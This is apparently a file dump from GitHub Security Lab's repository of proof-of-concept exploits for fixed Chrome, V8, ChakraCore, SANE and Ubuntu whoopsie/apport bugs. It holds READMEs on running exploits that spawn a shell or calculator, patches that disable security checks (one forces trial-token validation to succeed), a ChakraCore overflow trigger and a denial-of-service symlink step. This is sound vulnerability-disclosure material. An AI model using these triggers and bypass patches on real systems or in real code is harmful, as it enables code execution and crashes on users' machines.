23 | if (!ServerCardsAvailable())
24 | - return;
25 | +// return;
26 |
27 | // Do not make an unnecessary preflight call unless signaled.
28 | if (!can_fetch_unmask_details_.IsSignaled())
29 |
--------------------------------------------------------------------------------
/SecurityExploits/Chrome/SandboxEscape/CVE-2021-30528/arm/trigger.html:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
10 |
11 |
12 |
13 |
14 |
15 |
--------------------------------------------------------------------------------
/SecurityExploits/Chrome/SandboxEscape/CVE-2021-30528/copy_mojo_js_bindings.py:
--------------------------------------------------------------------------------
1 | #! /usr/bin/python
2 |
3 | import os
4 | import shutil
5 | import sys
6 |
7 | base_path = sys.argv[1]
8 | for path, dirs, files in os.walk(base_path):
9 | for file in files:
10 | if file == 'mojo_bindings.js':
11 | shutil.copyfile(os.path.join(path, file), os.path.join('./', file))
12 |
13 | if file.endswith('.mojom.js'):
14 | target_path = os.path.join('./', path[len(base_path) + 1:])
15 | try:
16 | os.makedirs(target_path)
17 | except:
18 | pass
19 | shutil.copyfile(os.path.join(path, file), os.path.join(target_path, file))
20 |
21 |
--------------------------------------------------------------------------------
/SecurityExploits/Chrome/SandboxEscape/GHSL-2020-165/copy_mojo_js_bindings.py:
--------------------------------------------------------------------------------
1 | #! /usr/bin/python
2 |
3 | import os
4 | import shutil
5 | import sys
6 |
7 | base_path = sys.argv[1]
8 | for path, dirs, files in os.walk(base_path):
9 | for file in files:
10 | if file == 'mojo_bindings.js':
11 | shutil.copyfile(os.path.join(path, file), os.path.join('./', file))
12 |
13 | if file.endswith('.mojom.js'):
14 | target_path = os.path.join('./', path[len(base_path) + 1:])
15 | try:
16 | os.makedirs(target_path)
17 | except:
18 | pass
19 | shutil.copyfile(os.path.join(path, file), os.path.join(target_path, file))
20 |
21 |
--------------------------------------------------------------------------------
/SecurityExploits/Chrome/SandboxEscape/GHSL-2020-165/payment_request_clip2.html:
--------------------------------------------------------------------------------
1 |
2 |
3 |
21 |
22 |
23 |
--------------------------------------------------------------------------------
/SecurityExploits/Chrome/SandboxEscape/GHSL-2020-165/payment_request_jam_clip.html:
--------------------------------------------------------------------------------
1 |
2 |
3 |
8 |
9 |
10 |
--------------------------------------------------------------------------------
/SecurityExploits/Chrome/SandboxEscape/GHSL-2020-165/sbx.patch:
--------------------------------------------------------------------------------
1 | diff --git a/third_party/blink/renderer/modules/payments/payment_request.cc b/third_party/blink/renderer/modules/payments/payment_request.cc
2 | index b0975c59ddb5..a2d7c273950c 100644
3 | --- a/third_party/blink/renderer/modules/payments/payment_request.cc
4 | +++ b/third_party/blink/renderer/modules/payments/payment_request.cc
5 | @@ -439,9 +439,9 @@ void StringifyAndParseMethodSpecificData(ExecutionContext& execution_context,
6 | if (supported_method == "basic-card") {
7 | BasicCardHelper::ParseBasiccardData(input, output->supported_networks,
8 | exception_state);
9 | - } else if (supported_method == kSecurePaymentConfirmationMethod &&
10 | + } else if (supported_method == kSecurePaymentConfirmationMethod/* &&
11 | RuntimeEnabledFeatures::SecurePaymentConfirmationEnabled(
12 | - &execution_context)) {
13 | + &execution_context)*/) {
14 | UseCounter::Count(&execution_context,
15 | WebFeature::kSecurePaymentConfirmation);
16 | output->secure_payment_confirmation =
17 |
--------------------------------------------------------------------------------
/SecurityExploits/Chrome/blink/CVE-2020-15972/out2.mp3:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/github/securitylab/105618fc1fa83c08f4446749e64310b539cb0262/SecurityExploits/Chrome/blink/CVE-2020-15972/out2.mp3
--------------------------------------------------------------------------------
/SecurityExploits/Chrome/blink/CVE-2020-15972/tear-down.js:
--------------------------------------------------------------------------------
1 | // white-noise-processor.js
2 | function sleep(miliseconds) {
3 | var currentTime = new Date().getTime();
4 | while (currentTime + miliseconds >= new Date().getTime()) {
5 | }
6 | }
7 |
8 | class AutoProcessor extends AudioWorkletProcessor {
9 | process (inputs, outputs, parameters) {
10 | sleep(5000);
11 | return true
12 | }
13 | }
14 |
15 | registerProcessor('tear-down', AutoProcessor)
16 |
--------------------------------------------------------------------------------
/SecurityExploits/Chrome/blink/CVE-2020-15972/tear_down2.html:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
49 |
50 |
51 |
52 |
--------------------------------------------------------------------------------
/SecurityExploits/Chrome/blink/CVE-2020-15972/tear_down2_virtual.html:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
35 |
36 |
37 |
38 |
--------------------------------------------------------------------------------
/SecurityExploits/Chrome/blink/CVE-2020-6449/delay-processor.js:
--------------------------------------------------------------------------------
1 | // white-noise-processor.js
2 | function sleep(miliseconds) {
3 | var currentTime = new Date().getTime();
4 | while (currentTime + miliseconds >= new Date().getTime()) {
5 | }
6 | }
7 |
8 | class DelayProcessor extends AudioWorkletProcessor {
9 | process (inputs, outputs, parameters) {
10 | sleep(2);
11 | return true
12 | }
13 | }
14 |
15 | registerProcessor('delay-processor', DelayProcessor)
16 |
--------------------------------------------------------------------------------
/SecurityExploits/Chrome/blink/CVE-2020-6449/finished_delay_release2.html:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
43 |
44 |
45 |
46 |
--------------------------------------------------------------------------------
/SecurityExploits/Chrome/blink/CVE-2020-6449/test-processor.js:
--------------------------------------------------------------------------------
1 | // white-noise-processor.js
2 | function sleep(miliseconds) {
3 | var currentTime = new Date().getTime();
4 | while (currentTime + miliseconds >= new Date().getTime()) {
5 | }
6 | }
7 |
8 | class TestProcessor extends AudioWorkletProcessor {
9 | process (inputs, outputs, parameters) {
10 | sleep(2);
11 | return true
12 | }
13 | }
14 |
15 | registerProcessor('test-processor', TestProcessor)
16 |
--------------------------------------------------------------------------------
/SecurityExploits/Chrome/blink/CVE-2020-6449/test-processor2.js:
--------------------------------------------------------------------------------
1 | // white-noise-processor.js
2 | function sleep(miliseconds) {
3 | var currentTime = new Date().getTime();
4 | while (currentTime + miliseconds >= new Date().getTime()) {
5 | }
6 | }
7 |
8 | class TestProcessor extends AudioWorkletProcessor {
9 | process (inputs, outputs, parameters) {
10 | sleep(300);
11 | return true
12 | }
13 | }
14 |
15 | registerProcessor('test-processor', TestProcessor)
16 |
--------------------------------------------------------------------------------
/SecurityExploits/Chrome/v8/CVE-2021-37975/chrome_poc_parent.html:
--------------------------------------------------------------------------------
1 |
2 |
3 |
55 |
56 |
57 |
58 |
59 |
60 |
--------------------------------------------------------------------------------
/SecurityExploits/Chrome/v8/CVE_2022_1134/README.md:
--------------------------------------------------------------------------------
1 | #Chrome renderer RCE CVE-2022-1134
2 |
3 | The write up can be found [here](https://github.blog/2022-06-29-the-chromium-super-inline-cache-type-confusion/). This is a bug in the v8 that I reported in March 2022. This bug allows RCE in the Chrome renderer sandbox by simply visiting a malicious website.
4 |
5 | The exploit is tested with the Linux official build of Chrome version `99.0.4844.84` with the following revision (this can be checked from `chrome://version`):
6 |
7 | ```
8 | Chromium 99.0.4844.84 (Official Build) (64-bit)
9 | Revision 81a11fc2ee8a41e17451f29195387f276d3bb379-refs/branch-heads/4844_74@{#6}
10 | ```
11 |
12 | For reference, the tested binary is compiled with the following flags, following the instructions to compile Chrome [here](https://chromium.googlesource.com/chromium/src/+/main/docs/linux/build_instructions.md):
13 |
14 | ```
15 | is_debug = false
16 | symbol_level = 2
17 | blink_symbol_level = 2
18 | dcheck_always_on = false
19 | is_official_build = true
20 | chrome_pgo_phase = 0
21 | ```
22 |
23 | To test, host the file `superic_rce.html` and then open it in Chrome with the `--no-sandbox` flag:
24 |
25 | ```
26 | ./chrome --user-data-dir=/tmp/chromium_data --no-sandbox
27 | ```
28 |
29 | If successful, it'll pop `xcalc` instantly (on Ubuntu). The exploit should be very reliable and I've not experience any failure with it.
30 |
--------------------------------------------------------------------------------
/SecurityExploits/Chrome/v8/CVE_2023_4069/README.md:
--------------------------------------------------------------------------------
1 | ## V8 type confusion CVE-2023-4069
2 |
3 | The analysis of this bug can be found [here]( https://github.blog/2023-10-17-getting-rce-in-chrome-with-incomplete-object-initialization-in-the-maglev-compiler).
4 |
5 | The exploit here is tested on `v8` version 11.5.150.16, which is the version shipped with Chrome 115.0.5790.98/99, the one before the bug was fixed, on Ubuntu 22.04. I have not tested it on Chrome itself.
6 |
7 | To test, check out `v8` at version 11.5.150.16 and compile with the default settings using `tools/dev/gm.py x64.release`. Then open the file `poc.js` with `d8` with the `maglev` flag (Chrome would have enabled this flag already):
8 |
9 | ```
10 | ./d8 --maglev poc.js
11 | ```
12 |
13 | On Ubuntu 22.04, it should call `execve("/bin/sh")` to spawn a new process:
14 |
15 | ```
16 | ./d8 --maglev exploit.js
17 | oobDblAddr: 421e9
18 | oobDblArr new length: 256
19 | oobDblAddr2: 42251
20 | oobObjAddr: 42299
21 | func Addr: 19bf6d
22 | code Addr: 19eb79
23 | maglev Addr: e000d900 55d6
24 | $
25 | ```
26 |
27 | Shell code and some addresses may need changing on other platforms.
28 |
29 |
30 |
--------------------------------------------------------------------------------
/SecurityExploits/Chrome/v8/CVE_2024_3833/README.md:
--------------------------------------------------------------------------------
1 | ## V8 type confusion CVE-2024-3833
2 |
3 | The analysis of this bug can be found [here](https://github.blog/2024-06-26-attack-of-the-clones-getting-rce-in-chromes-renderer-with-duplicate-object-properties).
4 |
5 | The exploit here is tested on the official build of Chrome version 123.0.6312.58, on Ubuntu 22.04. The following build config was used to build Chromium:
6 |
7 | ```
8 | is_debug = false
9 | symbol_level = 1
10 | blink_symbol_level = 1
11 | dcheck_always_on = false
12 | is_official_build = true
13 | chrome_pgo_phase = 0
14 | v8_symbol_level = 1
15 | ```
16 |
17 | The bug depends on an origin trial and to emulate it locally, the patch `trial-token.patch` should be applied before building Chrome.
18 |
19 | If successful, on Ubuntu 22.04, it should call launch `xcalc` when `wasm_poc.html` is opened in Chrome.
20 |
21 | Shell code and some addresses may need changing on other platforms.
22 |
23 |
24 |
--------------------------------------------------------------------------------
/SecurityExploits/Chrome/v8/CVE_2024_3833/trial-token.patch:
--------------------------------------------------------------------------------
1 | diff --git a/third_party/blink/common/origin_trials/trial_token.cc b/third_party/blink/common/origin_trials/trial_token.cc
2 | index e3a28923fce19..70c24dd445066 100644
3 | --- a/third_party/blink/common/origin_trials/trial_token.cc
4 | +++ b/third_party/blink/common/origin_trials/trial_token.cc
5 | @@ -116,6 +116,17 @@ OriginTrialTokenStatus TrialToken::Extract(
6 | std::string* out_token_payload,
7 | std::string* out_token_signature,
8 | uint8_t* out_token_version) {
9 | +
10 | + if (token_text.length() > kMaxTokenSize || public_key.size() == 0 || token_text.length() < kPayloadOffset) {
11 | + return OriginTrialTokenStatus::kMalformed;
12 | + }
13 | +
14 | + *out_token_payload = token_text;
15 | + *out_token_signature = "1234";
16 | + *out_token_version = kVersion2;
17 | + return OriginTrialTokenStatus::kSuccess;;
18 | +
19 | +/*
20 | if (token_text.empty()) {
21 | return OriginTrialTokenStatus::kMalformed;
22 | }
23 | @@ -178,6 +189,7 @@ OriginTrialTokenStatus TrialToken::Extract(
24 | *out_token_payload = token_contents.substr(kPayloadOffset, payload_length);
25 | *out_token_signature = std::string(signature);
26 | return OriginTrialTokenStatus::kSuccess;
27 | + */
28 | }
29 |
30 | // static
31 | --
32 |
--------------------------------------------------------------------------------
/SecurityExploits/Chrome/v8/CVE_2024_5830/README.md:
--------------------------------------------------------------------------------
1 | ## V8 type confusion CVE-2024-5830
2 |
3 | The analysis of this bug can be found [here](https://github.blog/2024-08-13-from-object-transition-to-rce-in-the-chrome-renderer).
4 |
5 | The exploit here is tested on the official build of Chrome version 125.0.6422.112, on Ubuntu 22.04. The following build config was used to build Chromium:
6 |
7 | ```
8 | is_debug = false
9 | symbol_level = 1
10 | blink_symbol_level = 1
11 | dcheck_always_on = false
12 | is_official_build = true
13 | chrome_pgo_phase = 0
14 | v8_symbol_level = 1
15 | ```
16 |
17 | If successful, on Ubuntu 22.04, it should call launch `xcalc` when `calc.html` is opened in Chrome.
18 |
19 | Shell code and some addresses may need changing on other platforms.
20 |
21 |
22 |
--------------------------------------------------------------------------------
/SecurityExploits/Facebook/Fizz/CVE-2019-3560/attacker/home/poc/Makefile:
--------------------------------------------------------------------------------
1 | poc: poc.c
2 | gcc -o poc poc.c
3 |
--------------------------------------------------------------------------------
/SecurityExploits/Facebook/Fizz/CVE-2019-3560/server/home/certs/ca.config:
--------------------------------------------------------------------------------
1 | [ req ]
2 | default_bits = 2048
3 | distinguished_name = dn
4 | x509_extensions = san
5 | req_extensions = san
6 | extensions = san
7 | prompt = no
8 |
9 | [ ca ]
10 | default_ca = ca_default
11 |
12 | [ ca_default ]
13 | private_key = root-ca-key.pem
14 | certificate = root-ca.pem
15 | new_certs_dir = new_certs
16 | database = root-ca.index
17 | default_md = sha256
18 | serial = root-ca.serial
19 | email_in_dn = no
20 | default_days = 365
21 | policy = policy
22 |
23 | [ policy ]
24 | countryName = optional
25 | stateOrProvinceName = optional
26 | localityName = optional
27 | organizationName = optional
28 | organizationalUnitName = optional
29 | commonName = supplied
30 |
31 | [ dn ]
32 | countryName = US
33 | stateOrProvinceName = CA
34 | localityName = San Francisco
35 | organizationName = Wholesome Certifications Inc.
36 | commonName = wholesomecertifications.com
37 | emailAddress = support@wholesomecertifications.com
38 |
39 | [ san ]
40 | basicConstraints = CA:TRUE
41 | subjectAltName = @alt_names
42 | subjectKeyIdentifier = hash
43 |
44 | [ alt_names ]
45 | DNS.1 = *.wholesomecertifications.com
46 | DNS.2 = *.wholesomecerts.com
47 |
--------------------------------------------------------------------------------
/SecurityExploits/Facebook/Fizz/CVE-2019-3560/server/home/certs/clean.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # Delete all auto-generated files.
4 |
5 | rm -f *~
6 | rm -rf new_certs
7 | rm -f root-ca*
8 | rm -f server-*.pem
9 | rm -f client-*.pem
10 |
--------------------------------------------------------------------------------
/SecurityExploits/Facebook/Fizz/CVE-2019-3560/server/home/certs/create-certs.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | mkdir new_certs
4 | touch root-ca.index
5 | touch root-ca.index.attr
6 | echo 00 > root-ca.crlnum
7 | openssl rand -hex 16 > root-ca.serial
8 |
9 | # create self-signed certificate
10 | openssl req -config ca.config -new -x509 -sha256 -newkey rsa:2048 -nodes \
11 | -keyout root-ca-key.pem -days 365 -out root-ca.pem
12 |
13 | # Create signing request for the server
14 | openssl req -config server.config -new -sha256 -newkey rsa:2048 -nodes \
15 | -keyout server-key.pem -days 365 -out server-request.pem
16 |
17 | # Create signed certificate for the server
18 | openssl ca -config server.config -batch -days 365 -extensions server_ext -out server-cert.pem -infiles server-request.pem
19 |
--------------------------------------------------------------------------------
/SecurityExploits/Facebook/Fizz/CVE-2019-3560/server/home/certs/server.config:
--------------------------------------------------------------------------------
1 | [ req ]
2 | default_bits = 2048
3 | distinguished_name = dn
4 | x509_extensions = server_ext
5 | req_extensions = server_ext
6 | extensions = server_ext
7 | prompt = no
8 |
9 | [ ca ]
10 | default_ca = ca_default
11 |
12 | [ ca_default ]
13 | private_key = root-ca-key.pem
14 | certificate = root-ca.pem
15 | new_certs_dir = new_certs
16 | database = root-ca.index
17 | default_md = sha256
18 | serial = root-ca.serial
19 | email_in_dn = no
20 | default_days = 365
21 | policy = policy
22 |
23 | [ policy ]
24 | countryName = optional
25 | stateOrProvinceName = optional
26 | localityName = optional
27 | organizationName = optional
28 | organizationalUnitName = optional
29 | commonName = supplied
30 |
31 | [ dn ]
32 | countryName = US
33 | stateOrProvinceName = CA
34 | localityName = San Francisco
35 | organizationName = Wholesome Computing Inc.
36 | commonName = server.wholesomecomputing.com
37 | emailAddress = support@wholesomecomputing.com
38 |
39 | [ server_ext ]
40 | basicConstraints = CA:FALSE
41 | subjectAltName = @alt_names
42 | subjectKeyIdentifier = hash
43 |
44 | [ alt_names ]
45 | DNS.1 = *.wholesomecomputing.com
46 |
--------------------------------------------------------------------------------
/SecurityExploits/Microsoft/ChakraCore/CVE-2017-0141/cve-2017-0141.js:
--------------------------------------------------------------------------------
1 | var a = [1];
2 | a.length = 1000;
3 |
4 | var o = {};
5 | Object.defineProperty(o, '1', {
6 | get: function() {
7 | for (var i = 0; i < 0x100000; i++) {
8 | a[0x100000 + i] = i;
9 | }
10 | return 2;
11 | }
12 | });
13 |
14 | a.__proto__ = o;
15 |
16 | var r = [].reverse.call(a);
17 |
--------------------------------------------------------------------------------
/SecurityExploits/README.md:
--------------------------------------------------------------------------------
1 | # SecurityExploits
2 | This directory contains proof-of-concept exploits developed by [GitHub Security Lab](https://securitylab.github.com) and other contributors. We always disclose security vulnerabilities responsibly, so this repository only contains exploits for vulnerabilities which have already been fixed and publicly disclosed.
3 |
--------------------------------------------------------------------------------
/SecurityExploits/SANE/epsonds_CVE-2020-12861/.gitignore:
--------------------------------------------------------------------------------
1 | fakescanner
2 | sane_backends_exploit
3 |
--------------------------------------------------------------------------------
/SecurityExploits/SANE/epsonds_CVE-2020-12861/Makefile:
--------------------------------------------------------------------------------
1 | all: fakescanner sane_backends_exploit
2 |
3 | fakescanner: fakescanner.cpp utils.hpp utils.cpp
4 | g++ -Wall -Wextra -O2 fakescanner.cpp utils.cpp -o fakescanner
5 |
6 | sane_backends_exploit: sane_backends_exploit.cpp utils.hpp utils.cpp
7 | g++ -Wall -Wextra -O2 sane_backends_exploit.cpp utils.cpp -o sane_backends_exploit
8 |
9 | clean:
10 | rm -f fakescanner sane_backends_exploit
11 |
--------------------------------------------------------------------------------
/SecurityExploits/SANE/epsonds_CVE-2020-12861/README.md:
--------------------------------------------------------------------------------
1 | # Vulnerabilities in SANE Backends and HPLIP
2 |
3 | This directory contains two proof-of-concept exploits for several vulnerabilities in
4 | [SANE Backends](https://gitlab.com/sane-project/backends).
5 |
6 | The first PoC, [fakescanner.cpp](fakescanner.cpp),
7 | is an enumeration of the different vulnerabilities listed in the
8 | [bug report](https://gitlab.com/sane-project/backends/-/issues/279).
9 | Run it like this:
10 |
11 | ```bash
12 | make
13 | ./fakescanner epson 0
14 | ```
15 |
16 | (There are different command-line options for triggering different bugs.)
17 | On a different computer, start
18 | [Simple Scan](https://packages.ubuntu.com/bionic/simple-scan).
19 |
20 | The second PoC, [sane_backends_exploit.cpp](sane_backends_exploit.cpp),
21 | is a more elaborate exploit which uses a subset of the vulnerabilities
22 | to pop a calculator.
23 | It is designed to target
24 | [Simple Scan](https://packages.ubuntu.com/bionic/simple-scan)
25 | on
26 | [Ubuntu 18.04 LTS](https://releases.ubuntu.com/bionic/).
27 | It will not work on more recent Ubuntu versions due to the glibc version
28 | being different.
29 | Run it like this:
30 |
31 | ```bash
32 | make
33 | ./sane_backends_exploit
34 | ```
35 |
36 | On a different computer, start
37 | [Simple Scan](https://packages.ubuntu.com/bionic/simple-scan).
38 |
--------------------------------------------------------------------------------
/SecurityExploits/SANE/epsonds_CVE-2020-12861/glibc_heap_exploit_demos/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM ubuntu:bionic
2 |
3 | RUN apt-get update && \
4 | apt-get install -y \
5 | build-essential gdb \
6 | tmux sudo emacs
7 |
8 | ARG UID=1000
9 |
10 | # Create a non-root user account.
11 | RUN adduser demo --disabled-password --uid $UID
12 |
13 | # Grant the 'demo' user sudo access. This is not used for the demo,
14 | # but it is often handy for installing extra packages.
15 | RUN adduser demo sudo
16 | RUN echo "demo:x" | chpasswd
17 | COPY home/ /home/demo/
18 | RUN chown -R demo:demo /home/demo
19 |
20 | # Switch over to the 'demo' user, since root access is no longer required
21 | USER demo
22 | WORKDIR /home/demo
23 |
--------------------------------------------------------------------------------
/SecurityExploits/SANE/epsonds_CVE-2020-12861/glibc_heap_exploit_demos/README.md:
--------------------------------------------------------------------------------
1 | Build the docker image:
2 |
3 | ```
4 | docker build . -t glibc-heap-exploit-demos --build-arg UID=`id -u`
5 | ```
6 |
7 | Start the container:
8 |
9 | ```
10 | docker run --rm -i -t glibc-heap-exploit-demos
11 | ```
12 |
--------------------------------------------------------------------------------
/SecurityExploits/SANE/epsonds_CVE-2020-12861/glibc_heap_exploit_demos/home/.gitignore:
--------------------------------------------------------------------------------
1 | 01_chunk_layout
2 | 02_arithmetic_with_top
3 | 03_overlap_top_chunk
4 | 04_A_fastbin_reverse_into_tcache
5 | 04_B_fastbin_reverse_into_tcache
6 | 05_shrink_tcache_chunk
7 |
--------------------------------------------------------------------------------
/SecurityExploits/SANE/epsonds_CVE-2020-12861/glibc_heap_exploit_demos/home/.tmux.conf:
--------------------------------------------------------------------------------
1 | # Enable 256 colors
2 | set -g default-terminal "screen-256color"
3 |
4 | # Enable using the mouse to switch windows.
5 | set -g mouse on
6 |
7 | # Don't lose track of SSH_AGENT etc. from parent environment.
8 | set -g update-environment -r
9 |
10 | # history buffer size
11 | set-option -g history-limit 100000
12 |
--------------------------------------------------------------------------------
/SecurityExploits/SANE/epsonds_CVE-2020-12861/glibc_heap_exploit_demos/home/Makefile:
--------------------------------------------------------------------------------
1 | PROGRAMS = 01_chunk_layout 02_arithmetic_with_top 03_overlap_top_chunk 04_A_fastbin_reverse_into_tcache 04_B_fastbin_reverse_into_tcache 05_shrink_tcache_chunk
2 | CFLAGS += -std=c99 -Wall -Wextra -O0 -g
3 |
4 | all: $(PROGRAMS)
5 | clean:
6 | rm -f $(PROGRAMS)
7 |
--------------------------------------------------------------------------------
/SecurityExploits/Ubuntu/Apport_TOCTOU_get_ignore_dom_CVE-2019-7307/.gitignore:
--------------------------------------------------------------------------------
1 | gencrashreport
2 | killwhoopsie1
3 | killwhoopsie2
4 | segv
5 | whoopsie_exploit
6 |
--------------------------------------------------------------------------------
/SecurityExploits/Ubuntu/Apport_TOCTOU_get_ignore_dom_CVE-2019-7307/Makefile:
--------------------------------------------------------------------------------
1 | all: gencrashreport killwhoopsie1 killwhoopsie2 segv whoopsie_exploit
2 |
3 | gencrashreport: gencrashreport.cpp utils.cpp
4 | g++ -Wall -O2 gencrashreport.cpp utils.cpp -o gencrashreport
5 |
6 | killwhoopsie1: killwhoopsie1.cpp utils.cpp
7 | g++ -Wall -O2 killwhoopsie1.cpp utils.cpp -o killwhoopsie1
8 |
9 | killwhoopsie2: killwhoopsie2.cpp utils.cpp
10 | g++ -Wall -O2 killwhoopsie2.cpp utils.cpp -o killwhoopsie2
11 |
12 | segv: segv.c
13 | gcc -Wall -O2 segv.c -o segv
14 |
15 | whoopsie_exploit: whoopsie_exploit.cpp restart_whoopsie.cpp load_crash_report.cpp encoding.c utils.cpp
16 | g++ -Wall -O2 whoopsie_exploit.cpp restart_whoopsie.cpp load_crash_report.cpp encoding.c utils.cpp -o whoopsie_exploit
17 |
18 | clean:
19 | rm -f gencrashreport killwhoopsie1 killwhoopsie2 segv whoopsie_exploit
20 |
--------------------------------------------------------------------------------
/SecurityExploits/Ubuntu/Apport_TOCTOU_get_ignore_dom_CVE-2019-7307/README_CVE-2019-11476.md:
--------------------------------------------------------------------------------
1 | # Integer overflow in parse_report (whoopsie CVE-2019-11476)
2 |
3 | [CVE-2019-11476](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11476)
4 | is a local denial of service vulnerability in
5 | [whoopsie](https://launchpad.net/ubuntu/+source/whoopsie).
6 | An integer overflow when reading large crash dumps (> 4GB) leads to a heap buffer overflow.
7 | I do not believe it is possible to exploit this heap buffer overflow to achieve code execution,
8 | so I have classified this bug as a denial of service.
9 | The full bug report is public on `bugs.launchpad.net`:
10 | [bug 1830863](https://bugs.launchpad.net/ubuntu/+source/whoopsie/+bug/1830863).
11 |
12 | ## Instructions
13 |
14 | Note: these reproduction steps will only work with a vulnerable version of whoopsie.
15 | See [CVE-2019-11476](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11476)
16 | for a list of vulnerable versions.
17 |
18 | Build the PoC as follows:
19 |
20 | ```bash
21 | make
22 | ```
23 |
24 | And run it like this:
25 |
26 | ```bash
27 | ./killwhoopsie1
28 | ```
29 |
30 | The PoC works by creating a file named `/var/crash/killwhoopsie.crash`,
31 | just over 4GB in size. It then creates a file named
32 | `/var/crash/killwhoopsie.upload`, which prompts whoopsie to start
33 | processing the .crash file. Be aware that whoopsie will keep restarting
34 | and crash repeatedly until you remove the files from `/var/crash`:
35 |
36 | ```bash
37 | rm /var/crash/killwhoopsie.*
38 | ```
39 |
--------------------------------------------------------------------------------
/SecurityExploits/Ubuntu/Apport_TOCTOU_get_ignore_dom_CVE-2019-7307/README_CVE-2019-11481.md:
--------------------------------------------------------------------------------
1 | # Symlink traversal in apport (CVE-2019-11481)
2 |
3 | [CVE-2019-11481](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11481)
4 | is a local denial of service vulnerability in
5 | [apport](https://launchpad.net/ubuntu/+source/apport).
6 | If `~/.config/apport/settings` is a symlink,
7 | then apport will read the target file,
8 | even if it requires root privileges to read.
9 | Apport usually errors out immediately after reading the file, though,
10 | so I do not believe it is possible to exploit this vulnerability in an interesting way.
11 | The full bug report is public on `bugs.launchpad.net`:
12 | [bug 1830862](https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1830862).
13 |
14 | ## Instructions
15 |
16 | Please be aware that these instructions are likely to make your
17 | computer completely unresponsive for several minutes.
18 |
19 | ```bash
20 | make
21 | mkdir -p ~/.config/apport
22 | ln -s /dev/zero ~/.config/apport/settings
23 | ./segv
24 | ```
25 |
26 | After running the exploit, don't forget to remove the malicious symlink:
27 |
28 | ```bash
29 | rm ~/.config/apport/settings
30 | ```
31 |
--------------------------------------------------------------------------------
/SecurityExploits/Ubuntu/Apport_TOCTOU_get_ignore_dom_CVE-2019-7307/README_CVE-2019-11484.md:
--------------------------------------------------------------------------------
1 | # Integer overflow in bson_ensure_space (whoopsie CVE-2019-11484)
2 |
3 | [CVE-2019-11484](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11484)
4 | is an integer overflow in [whoopsie](https://launchpad.net/ubuntu/+source/whoopsie).
5 | The integer overflow is triggered by a large crash report (> 2GB) and leads to
6 | a subsequent heap buffer overflow.
7 | This file contains instructions for running the simple version of the proof-of-concept exploit,
8 | which just causes whoopsie to crash with a segmentation fault.
9 | A more sophisticated PoC, which can get a shell as the whoopsie user, is described in
10 | [README_CVE-2019-15790](README_CVE-2019-15790.md).
11 | The full bug report is public on `bugs.launchpad.net`:
12 | [bug 1830865](https://bugs.launchpad.net/ubuntu/+source/whoopsie/+bug/1830865).
13 |
14 | ## Instructions
15 |
16 | Note: these reproduction steps will only work with a vulnerable version of whoopsie.
17 | See [CVE-2019-11484](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11484)
18 | for a list of vulnerable versions.
19 |
20 | Build the PoC as follows:
21 |
22 | ```bash
23 | make
24 | ```
25 |
26 | And run it like this:
27 |
28 | ```bash
29 | ./killwhoopsie2
30 | ```
31 |
--------------------------------------------------------------------------------
/SecurityExploits/Ubuntu/Apport_TOCTOU_get_ignore_dom_CVE-2019-7307/encoding.h:
--------------------------------------------------------------------------------
1 | bool make_string_valid(char* str);
2 |
--------------------------------------------------------------------------------
/SecurityExploits/Ubuntu/Apport_TOCTOU_get_ignore_dom_CVE-2019-7307/load_crash_report.hpp:
--------------------------------------------------------------------------------
1 | #include